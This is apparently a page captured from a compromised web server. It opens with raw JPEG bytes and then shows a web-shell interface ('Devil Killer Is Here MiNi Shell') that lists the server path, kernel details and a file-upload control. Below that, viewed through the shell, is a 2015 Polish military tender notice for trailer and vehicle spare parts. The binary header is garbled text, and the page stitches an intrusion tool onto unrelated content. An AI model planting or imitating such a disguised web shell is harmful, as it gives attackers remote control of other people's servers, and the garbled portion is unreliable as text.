JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150320/62312-N-2015.html

<p class="kh_header"><b>Warszawa: Dostawa części przyczep, naczep i innych pojazdów</b><br>
<b>Numer ogłoszenia: 62312 - 2015; data zamieszczenia: 20.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4226 , ul. Marsa 110, 04-470 Warszawa, woj. mazowieckie, tel. 22 6815 030, faks 22 6815 093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.2rblog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa/Jednostka budżetowa-Podsektor rządowy/Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa części przyczep, naczep i innych pojazdów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części przyczep, naczep i innych pojazdów w ilościach:
ZADANIE NR 1:
1. Duże ucho dyszla przyczepy D-46 z atestem w ilości 50 szt.;
2. Dyszel przyczepy podwozia D-46 z dużym uchem i atestem w ilości 20 szt.;
ZADANIE NR 2:
1. Drążek reakcyjny WN-16-102-40 WN-1 w ilości 12 szt.;
2. Osłona drążka z pierścieniem WN-160-247/N	szt. 12 szt.;
3. Kołek zabezpieczający sworznia resoru Star 266 nr kat 400-31-059 w ilości 100 szt.;
4. Komplet Tekalana fi 10 M16x1,5 HN w ilości 50 kpl.;
5. Komplet Tekalana fi 12 M18x1,5 HN w ilości 50 kpl.;
6. Komplet Tekalana fi 15 M22x1,5 HN w ilości 50 kpl.;
7. Komplet Tekalana fi 6 M12x1,5 HN w ilości 50 kpl.;
8. Komplet Tekalana fi 8 M14x1,5 HN w ilości 50 kpl.;
9. Zawleczka fi6,3 x 71 w ilości 5 kg;
10. Zawleczka fi8 x 80 w ilości 5 kg;
11. Uszczelka miedziana fi 12 x fi 24 x 2 w ilości 500 szt.;
12. Linka stalowa fi 4 w ilości 50 mb.;
13. Końcówka smarowniczki 2110769P (PN/64/S-61067) w ilości 50 szt.;
14. Smarowniczka prosta M10x1 w ilości 1000 szt.;
15. Łącznik odbioru oparów 44.00.05/3 - TM w ilości 5 szt.;
16. Odbój gumowy resory przyczepy D-46 ( bałwanek) w ilości 51 szt.;
17. Opaska zaciskowa ślimakowe ocynkowane fi 20 - fi 35 w ilości 300 szt.;
18. Opaska zaciskowa ślimakowe ocynkowane fi 40 - fi 60 w ilości 300 szt.;
19. Osłona przeciwbłotna - chlapacz podwozia D-83, tył J-325 315.177.171.10 w ilości 40 szt.;
ZADANIE NR 3:
1. Gniazdo czujnika N17EP-S ND-33 w ilości 5 szt.;
2. Końcówka przewodu elastycznego X50-15-50 w ilości 200 szt.;
3. Lampa biała okrągła - światła obrysowe do Przyczep D-46, D-83 z homologacją (płaskie mocowane na dwie śruby M-5) w ilości 100 szt.;
4. Lampa obrysowa przednia z homologacją nr 641 402 0162 (biało-czerwona)	w ilości 20 szt.;
5. Nakrętka przewodu elastycznego X50-15-51 w ilości 200 szt.;
6. Wkład reflektora  0223.8.001.2 H4 z homologacją europejską zamykany hermetycznie w ilości 50 szt.;
7. Zawór elektromagnetyczny EZP-24 (24V) Star 266	w ilości 50 szt.;
8. Amortyzator 315-1-41-00 Jelcz 325 w ilości 12 kpl.;
9. Zawór sterujący 471-005-010-0 w ilości 40 szt.;
ZADANIE NR 4:
1. Zawór hamulca główny kompletny 461.307.006.0 w ilości 20 szt.;
2. Zawór kulowy Dn 100 DP-14K do CND -33 (mocowany z jednej strony na 8 otw. fi 14 na średnicy podziałowej fi 180, z drugiej strony  na 8 otw. fi 14 na średnicy podziałowej fi 150, z dźwignią wskazującą kierunek przepływu) w ilości 10 szt.;
3. Regulator ciśnienia paliwa Jelcz 642 nr 99460567 5K w ilości 5 szt.;
4. Siłownik hamulcowy powietrzny X53.32.00 (fi 125) w ilości 50 szt.;
5. Siłownik powietrzny hamulcowy fi 180 lewy 925-302-192-0 w ilości 5 szt.;
6. Siłownik powietrzny hamulcowy fi 180 prawy 925-302-182-0 w ilości 8 szt.;
7. Zbiornik płynu hamulcowego Star 266 z pojemnikiem gumowym na wodę w ilości 60 szt.;
ZADANIE NR 5:
1. Lusterko zewnętrzne LG-1 w ilości 100 szt.;
2. Szyba przednia Jelcz 642 nr 1021529142019 w ilości 1 szt.;
3. Zamknięcie łaty pomiarowej 103.00.01 - TM w ilości 5 kpl.;
4. Sworzeń resoru podwozia D-46 w ilości 40 szt.;
5. Wieszak resoru WN-161-00-111Y w ilości 12 szt.;
ZADANIE NR 6:
1. Pistolet automatyczny ZVA2 4.1 ze złączem obrotowym i końcówką Camlock 1 1/2 cala w ilości 60 szt.;
2. Wylewka ZR 32  do pistoletu ZV400 w ilości 50 szt.;
3. Wylewka ZR 38  do pistoletu ZV400 w ilości 130 szt.;
ZADANIE NR 7:
1. Obejma skorupowa mocowana na bolec SX 32 w ilości 20 kpl.;
2. Obejma skorupowa mocowana na bolec SX 38 w ilości 50 kpl.;
3. Obejma skorupowa skręcana śrubami SC 38 w ilości 50 kpl.;
4. Obejma skorupowa skręcana śrubami SC 50 w ilości 20 kpl.;
5. Obejma skorupowa skręcana śrubami SC 76 - 16 bar - wykonanie nierdzewne w ilości 100 kpl.;
6. Obejma zaciskowa GBS 70-80 ocynkowana skręcana na śrubę w ilości 500 szt.;
ZADANIE NR 8:
1. Pokrywa włazu 58.00.185 ND33 - TM w ilości 10 szt.;
2. Pokrywa włazu 58.00.186 ND33 - TM w ilości 10 szt.;
ZADANIE NR 9:
1. Pokrywka 98.00.17 przyłącza 98.00.19 wahadła 4 cali, interlock, wziernik - TM do ND-33 w ilości 10 szt.;
2. Przyłącze 98.00.19 wahadła 4 cale, interlock, wziernik - TM do ND-33 w ilości 10 szt.;
3. Trzpień VRS 38x50 Ms Gwint wewnętrzny + obejma w ilości 50 kpl.;
ZADANIE NR 10:
1. Zaślepka DC 3 cale Al. 16 bar oznakowane z kartą katalogową w ilości 100 szt.;
2. Zaślepka DP 3 cale Al. 16 bar oznakowane z kartą katalogową w ilości 100 szt.;
3. Złącze C 3 cale Al. 16 bar oznakowane z kartą katalogową w ilości 100 szt.;
4. Złącze E 3 cale Al. 16 bar oznakowane z kartą katalogową w ilości 100 szt.;
ZADANIE NR 11:
1. Zawór sterujący przyczepy	w ilości 15 szt.;
2. Regulator siły hamowania 3-zakresowy w ilości 15 szt.;
3. Odwadniacz automatyczny	w ilości 15 szt.;
4. Amortyzator gumowy (odbój) w ilości 30 szt.;
5. Siłownik hamulcowy fi 80 X.53.12.00 w ilości 20 szt.;
6. Bęben hamulcowy przyczepy D-47 w ilości 4 szt.;
7. Szczęka hamulcowa prawa do przyczepy D-47 w ilości 8 szt.;
8. Szczęka hamulcowa lewa do przyczepy D-47	w ilości 8 szt.;
9. Filtr przewodowy w ilości 10 szt.;
10. Złącze przewodów hamulcowych w ilości 10 szt.;
11. Sprężyna szczęk hamulca w ilości 20 szt.;
12. Ucho dyszla przyczepy w ilości 2 szt.;
13. Amortyzator w ilości 8 szt.;
14. Kpl uszczelniaczy siłownika hamulcowego przyczepy fi 80 w ilości  20 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.22.10.00-3, 34.22.42.00-5, 34.22.41.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium w łącznej wysokości 8 550,00 PLN (słownie: osiem tysięcy pięćset pięćdziesiąt złotych), w tym na:
zadanie 1 -  1 100,00 PLN (słownie: jeden tysiąc sto złotych);
zadanie 2 -    350,00 PLN (słownie: trzysta pięćdziesiąt złotych);
zadanie 3 -    850,00 PLN (słownie: osiemset pięćdziesiąt złotych);
zadanie 4 -    950,00 PLN (słownie: dziewięćset pięćdziesiąt złotych);
zadanie 5 -    150,00 PLN (słownie: sto pięćdziesiąt złotych);
zadanie 6 -  2 000,00 PLN (słownie: dwa tysiące złotych);
zadanie 7 -    700,00 PLN (słownie: siedemset złotych);
zadanie 8 -    650,00 PLN (słownie: sześćset pięćdziesiąt złotych);
zadanie 9 -    550,00 PLN (słownie: pięćset pięćdziesiąt złotych);
zadanie 10 -  850,00 PLN (słownie: osiemset pięćdziesiąt złotych złotych);
zadanie 11 -  400,00 PLN (słownie: czterysta złotych);
Wykonawca składający ofertę na wybrane zadania dokonuje wpłaty wadium w wysokości wyszczególnionej dla poszczególnych zadań (części). 
2. Wadium musi być wniesione przed upływem terminu składania ofert.
3. Wykonawca zobowiązany jest wnieść wadium na cały okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, minimum 1 (jedną) dostawę, odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot zamówienia z podaniem wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane. Wykonawca obowiązany jest do załączenia dowodów potwierdzających, że te dostawy zostały wykonane lub są wykonywane należycie, np. poświadczenie. W odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie to powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. Jeżeli z uzasadnionych przyczyn, o obiektywnym charakterze, wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej, zamawiający uzna, że wystarczającym dowodem jest oświadczenie wykonawcy.
Wartość każdej (pojedynczej) dostawy winna być nie mniejsza niż:
na zadanie 1 -   35 000,00 zł;
na zadanie 2 -   10 000,00 zł;
na zadanie 3 -   25 000,00 zł;
na zadanie 4 -   30 000,00 zł;
na zadanie 5 -     5 500,00 zł;
na zadanie 6 -   60 000,00 zł;
na zadanie 7 -   20 000,00 zł;
na zadanie 8 -   20 000,00 zł;
na zadanie 9 -   15 000,00 zł;
na zadanie 10 - 25  000,00 zł;
na zadanie 11 -  12 000,00 zł.

UWAGA!
Jeżeli Wykonawca składa ofertę na kilka części (zadań) jednocześnie, a na potwierdzenie spełnienia warunku posiada jedną dostawę (oraz np. poświadczenia), wartość tej dostawy winna być nie mniejsza niż łączna kwota, wykonanych dostaw, wymagana w celu potwierdzenia spełnienia warunku dla części (zadań) na które składana jest oferta. 
W przypadku świadczeń okresowych lub ciągłych, wartość wykonanej dostawy do dnia wydania poświadczenia należytego wykonania, musi być wystarczająca do wykazania spełniania warunku udziału. W przypadku składania oferty na wiele zadań mają zastosowanie zapisy akapitu powyżej. 
Za dostawy tego samego rodzaju zamawiający uzna dostawy przedmiotów 
o przeznaczeniu i funkcji tożsamej z przedmiotem zamówienia.
W przypadku wartości dostaw wyrażonej w innej walucie, Zamawiający, w celu oceny spełnienia ww. warunku, dokona przeliczenia tych wartości wg. kursu z dnia zawarcia umowy   na podstawie Tabeli kursów średnich NBP publikowanych na stronie internetowej:
http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.2rblog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, ul. Marsa 110, 04-470 Warszawa, budynek nr 1, pokój nr 101..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2015 godzina 08:00, miejsce: Siedziba Zamawiającego, ul. Marsa 110, 04-470 Warszawa, budynek nr 3, pokój nr 8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa części przyczep, naczep i innych pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części przyczep, naczep i innych pojazdów w ilościach:
ZADANIE NR 1:
1. Duże ucho dyszla przyczepy D-46 z atestem w ilości 50 szt.;
2. Dyszel przyczepy podwozia D-46 z dużym uchem i atestem w ilości 20 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.40.00-3, 34.22.42.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa części przyczep, naczep i innych pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części przyczep, naczep i innych pojazdów w ilościach:
ZADANIE NR 2:
1. Drążek reakcyjny WN-16-102-40 WN-1 w ilości 12 szt.;
2. Osłona drążka z pierścieniem WN-160-247/N	szt. 12 szt.;
3. Kołek zabezpieczający sworznia resoru Star 266 nr kat 400-31-059 w ilości 100 szt.;
4. Komplet Tekalana fi 10 M16x1,5 HN w ilości 50 kpl.;
5. Komplet Tekalana fi 12 M18x1,5 HN w ilości 50 kpl.;
6. Komplet Tekalana fi 15 M22x1,5 HN w ilości 50 kpl.;
7. Komplet Tekalana fi 6 M12x1,5 HN w ilości 50 kpl.;
8. Komplet Tekalana fi 8 M14x1,5 HN w ilości 50 kpl.;
9. Zawleczka fi6,3 x 71 w ilości 5 kg;
10. Zawleczka fi8 x 80 w ilości 5 kg;
11. Uszczelka miedziana fi 12 x fi 24 x 2 w ilości 500 szt.;
12. Linka stalowa fi 4 w ilości 50 mb.;
13. Końcówka smarowniczki 2110769P (PN/64/S-61067) w ilości 50 szt.;
14. Smarowniczka prosta M10x1 w ilości 1000 szt.;
15. Łącznik odbioru oparów 44.00.05/3 - TM w ilości 5 szt.;
16. Odbój gumowy resory przyczepy D-46 ( bałwanek) w ilości 51 szt.;
17. Opaska zaciskowa ślimakowe ocynkowane fi 20 - fi 35 w ilości 300 szt.;
18. Opaska zaciskowa ślimakowe ocynkowane fi 40 - fi 60 w ilości 300 szt.;
19. Osłona przeciwbłotna - chlapacz podwozia D-83, tył J-325 315.177.171.10 w ilości 40 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.40.00-3, 34.22.42.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa części przyczep, naczep i innych pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części przyczep, naczep i innych pojazdów w ilościach:
ZADANIE NR 3:
1. Gniazdo czujnika N17EP-S ND-33 w ilości 5 szt.;
2. Końcówka przewodu elastycznego X50-15-50 w ilości 200 szt.;
3. Lampa biała okrągła - światła obrysowe do Przyczep D-46, D-83 z homologacją (płaskie mocowane na dwie śruby M-5) w ilości 100 szt.;
4. Lampa obrysowa przednia z homologacją nr 641 402 0162 (biało-czerwona)	w ilości 20 szt.;
5. Nakrętka przewodu elastycznego X50-15-51 w ilości 200 szt.;
6. Wkład reflektora  0223.8.001.2 H4 z homologacją europejską zamykany hermetycznie w ilości 50 szt.;
7. Zawór elektromagnetyczny EZP-24 (24V) Star 266	w ilości 50 szt.;
8. Amortyzator 315-1-41-00 Jelcz 325 w ilości 12 kpl.;
9. Zawór sterujący 471-005-010-0 w ilości 40 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.40.00-3, 34.22.42.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa części przyczep, naczep i innych pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części przyczep, naczep i innych pojazdów w ilościach:
ZADANIE NR 4:
1. Zawór hamulca główny kompletny 461.307.006.0 w ilości 20 szt.;
